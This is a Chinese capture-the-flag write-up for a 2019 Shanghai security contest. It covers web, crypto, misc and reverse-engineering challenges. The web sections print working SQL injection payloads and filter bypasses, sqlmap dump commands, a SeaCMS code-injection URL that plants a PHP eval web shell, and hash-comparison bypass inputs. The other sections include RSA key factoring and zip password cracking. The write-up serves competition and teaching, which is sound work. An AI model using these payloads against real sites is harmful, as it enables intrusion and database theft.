2019“嘉韦思杯”上海市网络安全邀请赛WriteUp
- 2019 年 10 月 8 日
- 筆記
Web1 土肥原贤二 100pt

尝试提交 gid=1'
报错, gid=1or1=1
回显正常,直接使用 sqlmap
进行测试,存在以下注入方式:
Parameter: gid (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: gid=-4255' OR 8149=8149# Vector: OR [INFERENCE]# Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: gid=3' OR (SELECT 3949 FROM(SELECT COUNT(*),CONCAT(0x717a717671,(SELECT (ELT(3949=3949,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Ilbj Vector: OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind Payload: gid=3' OR SLEEP(5)-- XAjo Vector: OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: gid=3' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a717671,0x4845486a6d6e79654d7a704461694b426771414872527a57624a724e78735943417a686b53664d6b,0x7178787a71)# Vector: UNION ALL SELECT NULL,NULL,NULL,[QUERY]#
Payload: sqlmap-u"http://47.103.43.235:81/quest/web/a/index.php?gid=1"-p gid-v3-D luozhen-T flag-C"id,flag"--dump
.

Web2 戴星炳 200pt

2s快速提交正确结果即可获取flag,Python脚本:
import re import requests url = 'http://47.103.43.235:82/web/a/index.php' r = requests.session() text = r.get(url).text calc = str(re.findall("</p><p>(.*?)</p>", text))[2:-2] ans = eval(calc) data = {'result':ans} res = r.post(url, data) print(res.text)
运行结果:flag{Y0U4R33o_F4ST!}。
WriteUp记录到这里的时候主办方再次关闭了比赛官网,只开放题目链接,下面就各题目进行记录~
Web3 MD5碰撞
题目链接:http://47.103.43.235:85/a/

F12查看网页源代码发现以下注释PHP代码:
if ((string)$_POST['param1']!==(string)$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2']))
两次比较( !==
/ ===
)均采用了比较严格的比较,无法通过弱类型的比较去绕过。
可以通过MD5碰撞生成器fastcoll_v1.0.0.5.exe.zip 来构造两个MD5值相同,但内容不同的字符串来绕过。
这里参考MD5碰撞-奶奶奶奶奶糖的样本提交进行测试~
Payload:
param1= %D89%A4%FD%14%EC%0EL%1A%FEG%ED%5B%D0%C0%7D%CAh%16%B4%DFl%08Z%FA%1DA%05i%29%C4%FF%80%11%14%E8jk5%0DK%DAa%FC%2B%DC%9F%95ab%D2%09P%A1%5D%12%3B%1ETZ%AA%92%16y%29%CC%7DV%3A%FF%B8e%7FK%D6%CD%1D%DF/a%DE%27%29%EF%08%FC%C0%15%D1%1B%14%C1LYy%B2%F9%88%DF%E2%5B%9E%7D%04c%B1%B0%AFj%1E%7Ch%B0%96%A7%E5U%EBn1q%CA%D0%8B%C7%1BSP ¶m2= %D89%A4%FD%14%EC%0EL%1A%FEG%ED%5B%D0%C0%7D%CAh%164%DFl%08Z%FA%1DA%05i%29%C4%FF%80%11%14%E8jk5%0DK%DAa%FC%2B%5C%A0%95ab%D2%09P%A1%5D%12%3B%1ET%DA%AA%92%16y%29%CC%7DV%3A%FF%B8e%7FK%D6%CD%1D%DF/a%DE%27%29o%08%FC%C0%15%D1%1B%14%C1LYy%B2%F9%88%DF%E2%5B%9E%7D%04c%B1%B0%AFj%9E%7Bh%B0%96%A7%E5U%EBn1q%CA%D0%0B%C7%1BSP

得到flag{MD5@_@success}。
Web4 SeaCMS
题目地址:http://47.103.43.235:84/

后台地址:http://47.103.43.235:84/admin/login.php
尝试弱口令登录后台,回显 admin
用户不存在。

参考Seacms漏洞分析利用复现 By Assassin Search.php
漏洞利用姿势,写入一句话木马,用Cknife连接之。
Payload:
http://47.103.43.235:84/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

在根目录下发现flag.txt,获取flag{!!seacms_@@}。
Web5 Break the sha
题目地址:http://47.103.43.235:82/web/b/index.php

F12查看源代码发现 <!--index.phps-->
,访问下载index.phps文件打开获取:
<?php error_reporting(0); $flag = '********'; if (isset($_POST['name']) and isset($_POST['password'])){ if ($_POST['name'] == $_POST['password']) print 'name and password must be diffirent'; else if (sha1($_POST['name']) === sha1($_POST['password'])) die($flag); else print 'invalid password'; } ?>
name与password字段用 ==
弱类型进行比较,sha1用 ===
进行强类型比较,可以用数组绕过。
Payload:
name[]=1&password[]=2
回显:flag{Y0ujustbr0ke_sha1}。
Web6 SQLi2
题目地址:http://47.103.43.235:83/web/a/index.php?id===QM

观察到 id===MQ
,QM==是1的Base64编码,推测为Base64编码后逆序传值。
手工注入测试发现过滤了 and
、 or
、 select
、 union
关键字,去除了单引号、双引号、等号、空格等字符,可以双写绕过关键字的过滤,采用 /**/
绕过空格,使用字符窜的hex编码绕过引号以及使用 regexp
绕过等号。
- 爆数据库
-1/**/uniunionon/**/selselectect/**/1,group_concat(schema_name),3,4,5,6/**/from/**/infoorrmation_schema.schemata--

- 爆ctf_sql中的表
-1/**/uniunionon/**/selselectect/**/1,group_concat(table_name),3,4,5,6/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema/**/regexp/**/0x6374665f73716c--

- 爆flag中的列
-1/**/uniunionon/**/selselectect/**/1,group_concat(column_name),3,4,5,6/**/from/**/infoorrmation_schema.columns/**/where/**/table_name/**/regexp/**/0x666c6167--

- 获取flag
-1/**/uniunionon/**/selselectect/**/1,group_concat(flag),3,4,5,6/**/from/**/flag--

Crypto1 神秘代码

Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSWFJteFZVMjA1VjAxV2JETlhhMk0xVmpKS1NHVkVRbUZXVmxsM1ZqQmFTMlJIVmtkWGJGcHBWa1phZVZadGVGWmxSbGw1Vkd0c2FsSnRhRzlVVm1oRFZWWmFkR05GZEZSTlZXdzFWVEowVjFaWFNraGhSemxWVmpOT00xcFZXbXRXTVhCRlZXeHdWMDFFUlRCV2Fra3hVakZhV0ZOcmFGWmlhMHBYV1d4b1UwMHhWWGhYYlhSWFRWWndNRlZ0ZUZOVWJVWTJVbFJDVjJFeVRYaFdSRVpyVTBaT2NscEhjRk5XUjNob1YxZDRiMVV4VWtkWGJrNVlZbGhTV0ZSV1pEQk9iR3hXVjJ4T1ZXSkdjRlpXYlhoelZqRmFObEZZYUZkU1JYQklWbXBHVDFkV2NFZGhSMnhUWVROQ1dsWXhXbXROUjFGNVZXNU9hbEp0VWxsWmJGWmhZMnhXY1ZKdFJsUlNiR3cxVkZaU1UxWnJNWEpqUm1oV1RXNVNNMVpxU2t0V1ZrcFpXa1p3VjFKWVFrbFdiWEJIVkRGa1YyTkZaR2hTTW5oVVdWUk9RMWRzV1hoWGJYUk9VbTE0V0ZaWGRHdFdNV1JJWVVac1dtSkhhRlJXTUZwVFZqRndSMVJ0ZUdsU2JYY3hWa1phVTFVeFduSk5XRXBxVWxkNGFGVXdhRU5TUmxweFUydGFiRlpzU2xwWlZWcHJZVWRGZWxGcmJGZGlXRUpJVmtSS1UxWXhXblZWYldoVFlYcFdlbGRYZUc5aU1XUkhWMjVTVGxkSFVsWlVWbHBIVFRGU2MxWnRkRmRpVlhCNVdUQmFjMWR0U2tkWGJXaGFUVlp3ZWxreU1VZFNiRkp6Vkcxc1UySnJTbUZXTW5oWFdWWlJlRmRzYUZSaVJuQnhWV3hrVTFsV1VsWlhiVVpyWWtad2VGVnRkREJWTWtwSVZXcENXbFpXY0hKWlZXUkdaVWRPU0U5V2FHaE5WbkJ2Vm10U1MxUXlUWGxVYTFwaFVqSm9WRlJYTVc5bGJHUllaVWM1YVUxWFVucFdNV2h2VjBkS1dWVnJPVlppVkVVd1ZqQmFZVmRIVWtoa1JtUnBWbGhDU2xkV1ZtOVVNVnAwVW01S1QxWnNTbGhVVlZwM1ZrWmFjVkp0ZEd0V2JrSkhWR3hhVDJGV1NuUlBWRTVYVFc1b1dGbFVRWGhUUmtweVdrWm9hV0Y2Vm5oV1ZFSnZVVEZzVjFWc1dsaGlWVnB6V1d0YWQyVkdWWGxrUjNSb1lsVndWMWx1Y0V0V2JGbDZZVVJPV21FeVVrZGFWM2hIWTIxS1IyRkdhRlJTVlhCS1ZtMTBVMU14VlhoWFdHaFhZbXhhVjFsc2FFTldSbXhaWTBaa2EwMVdjREJaTUZZd1lWVXhXRlZyYUZkTmFsWlVWa2Q0UzFKc1pIVlRiRlpYWWtoQ05sWkhlR0ZaVm1SR1RsWmFVRlp0YUZSWmJGcExVMnhhYzFwRVVtcE5WMUl3VlRKMGIyRkdTbk5UYlVaVlZteHdNMVpyV21GalZrcDFXa1pPVGxacmIzZFhiRlpyWXpGVmVWTnNiRnBOTW1oWVZGWmFTMVZHY0VWU2EzQnNVbTFTV2xkclZURldNVnB6WTBaV1dGWXpVbkpXVkVaelZqRldjMWRzYUdsV1ZuQlFWa1phWVdReVZrZFdibEpzVTBkU2NGVnFRbmRXTVZsNVpFaGtWMDFFUmpGWlZWSlBWMjFGZVZWclpHRldNMmhJV1RKemVGWXhjRWRhUlRWT1VsaENTMVp0TVRCVk1VMTRWVzVTVjJFeVVtaFZNRnBoVmpGc2MxcEVVbGRTYlhoYVdUQmFhMWRHV25OalJteGFUVVpWTVZsV1ZYaFhSbFp6WVVaa1RsWXlhREpXTVZwaFV6RkplRlJ1VmxKaVJscFlXV3RvUTFkV1draGtSMFpvVFdzMWVsWXlOVk5oTVVsNVlVWm9XbFpGTlVSVk1WcHJWbFpHZEZKc1drNVdNVWwzVmxkNGIySXhXWGhhUldob1VtMW9WbFpzV25kTk1XeFdWMjVrVTJKSVFraFdSM2hUVlRKRmVsRllaRmhpUmxweVdYcEdWbVZXVG5KYVIyaE9UVzFvV1ZaR1l6RlZNV1JIVjJ4V1UyRXhjSE5WYlRGVFYyeGtjbFpVUmxkTmEzQktWVmMxYjFZeFdqWlNWRUpoVWtWYWNsVnFTa3RUVmxKMFlVWk9hR1ZzV2pSV2JUQjRaV3N4V0ZadVRsaGlSMmh4V2xkNFlWWXhVbGRYYlVaWFZteHdlbGxWYUd0V2F6RldWbXBTVjJKWVFtaFdiVEZHWkRGYWRWUnNWbGRTVlhCVVYxZDBWbVF5VVhoV2JGSlhWMGhDVkZWV1RsWmxiRXBFVmxod1UxRlRWWHBTUTFWNlVrRWxNMFFsTTBRJTNE
在Base64解密不断进行B64解密得到:
fB__l621a4h4g_ai{&i}
共20个字符,尝试进行4*5分列得到:
fB__ l621 a4h4 g_ai {&i}
得到flag{B64&2hai_14i}.
Crypto2 神秘代码2

脑洞题目~尝试进行移位变换最终检索到flag{c4es4r_variation},为凯撒移位的变种。
C++ Payload:
string s = "bg[`sZ*Zg'dPfP`VM_SXVd"; for(int diff = 0; diff <= 10; diff++) { //diff为4时得到flag{c4es4r_variation} for(int i = 0; i < s.length(); i++) { cout << char(s[i] + diff + i); } cout << endl; }
Crypto3 希尔密码

给出加密矩阵和密文求明文,这里可以参考希尔密码解密过程求出3*3解密矩阵:
[[8,16,27],[8,99 ,24],[27,24,27]],这里乘上3*4密文矩阵 [[23,10,12,24],[16,2,25,3,],[9,0,9,5]]得到矩阵:

对26进行取余后转化为字符打印得到 hillisflagxx
,C++脚本:
#include <iostream> using namespace std; int a[12] = {683,112,739,375,1984,278,2787,609,1248,318,1167,855}; int main() { for(int i = 0; i < 12; i++) { cout << (char)('a' + a[i] % 26); } return 0; }
Crypto4 RSA256
题目地址:http://47.103.43.235:85/C/RSA256.tar.gz
下载解压后得到公钥gy.key和fllllllag.txt。

- 解法1
通过openssl查看公钥信息:
$ openssl rsa -pubin -in gy.key -text -modulus Public-Key: (256 bit) Modulus: 00:a9:bd:4c:7a:77:63:37:0a:04:2f:e6:be:c7:dd: c8:41:60:2d:b9:42:c7:a3:62:d1:b5:d3:72:a4:d0: 89:12:d9 Exponent: 65537 (0x10001) Modulus=A9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9 writing RSA key -----BEGIN PUBLIC KEY----- MDwwDQYJKoZIhvcNAQEBBQADKwAwKAIhAKm9THp3YzcKBC/mvsfdyEFgLblCx6Ni 0bXTcqTQiRLZAgMBAAE= -----END PUBLIC KEY-----
获取模数(Modulus) N=76775333340223961139427050707840417811156978085146970312315886671546666259161(0xA9BD4C7A7763370A042FE6BEC7DDC841602DB942C7A362D1B5D372A4D08912D9),以及公钥指数(Exponent)e=65537 (0x10001)。
模数N在http://factordb.com可在线分解为:
p = 273821108020968288372911424519201044333 q = 280385007186315115828483000867559983517
已知n(可分解为p,q),e,c,可以计算出d后解密,Python脚本:
import gmpy2 import rsa p = 273821108020968288372911424519201044333 q = 280385007186315115828483000867559983517 n = 76775333340223961139427050707840417811156978085146970312315886671546666259161 e = 65537 d = int(gmpy2.invert(e , (p-1)*(q-1))) privatekey = rsa.PrivateKey(n , e , d , p , q) with open("fllllllag.txt" , "rb") as f: print(rsa.decrypt(f.read(), privatekey).decode())
得到flag{2o!9CTFECUN}。
- 解法2
已知公钥gy.key和cipher message fllllllag.txt求解明文,这里尝试用RSACtfTool(项目地址:https://github.com/Ganapati/RsaCtfTool)直接进行解密:
D:ToolsCryptoRSACtfToolRsaCtfTool $ python2 RsaCtfTool.py --publickey gy.key --uncipherfile fllllllag.txt [+] Clear text : b'x00x02cx8bLxc2ux86xc6xbex00flag{_2o!9_CTF_ECUN_}'
获取flag{2o!9CTFECUN}。
Misc1 奇怪的单点音
题目地址:http://47.103.43.235:85/d/奇怪的单点音.wav
播放音频有明显的杂音和3次嘟声,尝试用 Aduacity
打开分析,观察频谱图发现flag字段:

Hint:主办方声明flag{85a9d4517d4725b98cbc9fd_554216}并非最终答案,请认真审题。
接下来就是脑洞部分,观察到字符串(含下划线)共32位,疑似MD5加密,尝试替换下划线为摩斯密码的t、以及字符串中未出现的数字,当下划线全替换为 0
时在ChaMd5.org成功解密。

获取flag{hsd132456}.
Misc2 二维码

下载图片尝试使用 binwalk
进行探测:
$ python binwalk index.png DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 PNG image, 256 x 256, 8-bit/color RGBA, non-interlaced 41 0x29 Zlib compressed data, compressed 5708 0x164C Zip archive data, encrypted at least v1.0 to extract, compressed size: 64, uncompressed size: 52, name: key.txt
发现存在压缩包文件,得到Hint:解压密码为管理人员的QQ号,使用binwalk -e 分离后使用ARCHPR进行爆破。

获取密码 674290437
,解压得到flag{d6@YX$_m^aa0}。
Misc3 jsfuck
题目地址: http://47.103.43.235:85/b/%E7%AC%AC%E4%B8%80%E9%A2%98_js%EF%BC%9F.txt

Base64解码后得到 jsfuck
加密的js脚本,直接复制在控制台Console运行即可获取flag{sdf465454dfgert32}。
RE1 梅津美治郎
查壳无壳,为32位PE文件,在IDA中查看:

Level1基本没什么难度,进入Level2:

这里有个反调试函数,使用x86dbug调试会直接退出。但是使用OD或者吾爱破解版本的OD可以解决这个反调试函数。往后动态调试进到

其操作就是将

里的数据与0x2异或,然后与输入对比,相同即可。
a = [0x75,0x31,0x6e,0x6e,0x66,0x32,0x6c,0x67] for i in a: print (chr(i ^ 0x2),end = '')
得到 w3lld0ne
。

使用下划线连接,得到flag{r0b0RUlez!_w3lld0ne}.
RE2 76号
查看无壳为32位ELF文件。这个纯静态观察即可,查看字符串,这里有correct:

交叉引用,可以进入到main函数,这里阅读main函数,可以看到printf后再跟getline获取输入,再跟到后面一个check函数 0x804848f,然后根据返回结果判断是否正确。接下来进入到该check函数:

反编译check函数,是一个switch。函数的两个参数一个是我们输入的字符串地址,一个是0。寻找问题的关键点在于返回1.

注意每一个return,将可能返回1的return作为重点查看。例如:



在while循环的开头,每次会填充堆栈里的一个值为1,该值与我们输入有关。以v5[0]为起点。然后仔细阅读C代码,尝试:

发现符合程序流程。后续继续猜测令V2等于2的case,以此类推。4和8的比较特殊,后面都是手动验证,发现正确符合规律,获取flag{09vdf7wefijbk}~
Crypto&Misc&RE题目下载链接: https://pan.baidu.com/s/10tlJmUVZtekuYNgTi9eCNQ 提取码: bkiv